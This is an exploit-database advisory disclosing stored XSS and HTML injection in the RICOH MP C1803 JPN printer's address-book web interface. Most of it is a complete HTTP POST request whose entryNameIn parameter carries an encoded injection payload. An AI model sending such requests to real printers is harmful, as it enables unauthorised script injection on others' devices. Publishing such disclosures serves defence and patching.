RICOH MP C1803 JPN Printer Cross-Site Scripting

2018.10.08
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

# Exploit Title: RICOH MP C1803 JPN Printer - Cross-Site Scripting # Date: 2018-09-21 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.ricoh.com/ # Hardware Link : https://www.ricoh.co.jp/mfp/mp_c/1803/ # Software : RICOH Printer # Product Version: MP C1803 JPN # Vulernability Type : Code Injection # Vulenrability : HTML Injection and Stored XSS # Affected Products: RICOH MP C1803 JPN, RICOH MP C307 # CVE : CVE-2018-17310, CVE-2018-17313 # On the RICOH MP C1803 JPN printer, HTML Injection and Stored XSS vulnerabilities have # been discovered in the area of adding addresses via the entryNameIn parameter to /web/entry/en/address/adrsSetUserWizard.cgi. # HTTP POST Request : POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1 Host: Target User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/plain, */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://Target/web/entry/en/address/adrsList.cgi Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 209 Cookie: risessionid=125831398474617; cookieOnOffChecker=on; wimsesid=911065987 Connection: close mode=ADDUSER&step=BASE&wimToken=847703007&entryIndexIn=00002&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryReadNameIn=&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top